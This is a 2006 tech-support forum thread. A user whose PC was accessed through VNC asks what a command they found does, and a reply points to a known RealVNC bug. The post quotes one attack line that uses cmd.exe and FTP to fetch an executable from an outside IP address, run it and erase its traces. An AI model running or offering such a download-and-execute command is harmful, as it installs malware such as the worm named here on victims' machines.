Solved

I got hacked. Found this command,

Posted on 2006-11-09
1
282 Views
Last Modified: 2010-03-05
I was trouble shooting a time out issue with my internet connection.  During this process I disconnected my switch, then I took my router of the mix.  At this point , my PC was connected directly to my DSL modem.  After 15 minutes past I walked away from my pc for 2 minutes.  I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen.  I immediatly closed the VNC session.  I then went to run a netstat to see if someone was connected and noticed this string in the command window.

cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit

That same IP address was the ip address that connected to my computer via VNC.  I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm.  Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.

Can anyone tell me for sure what the above command does?
0
Comment
Question by:steveLaMi
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
1 Comment
 
LVL 47

Accepted Solution

by:
rpggamergirl earned 500 total points
ID: 17910951
There are 2 or 3 questions already with similar issues and theirs were caused by the RealVNC bug of some version.

Here's one of the question I found:
http://www.experts-exchange.com/Operating_Systems/WinXP/Q_22051676.html#17903231
0

Featured Post

Windows running painfully slow? Try these tips..

Stay away from Speed Up Computer Programs that do more harm than good.
Try these tips instead.
Step by step instructions in trouble shooting Windows Performance issues.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
android samsung attempts 10 87
Report to police 8 63
Is https://www.google.com/#sp=1 etc. legitimate? 2 277
Better malware protection 9 43
Many of you may be aware of the recent Google Docs scam emails that have been floating around coming from various people that you know. Here's a guide on identifying How To Identify the Scam Email You will see an email from someone you’ve had co…
A hard and fast method for reducing Active Directory Administrators members.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, just open a new email message. In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…

739 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question